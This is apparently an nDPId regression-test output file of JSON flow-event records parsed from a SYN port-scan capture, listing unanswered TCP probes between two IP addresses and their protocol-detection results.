-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
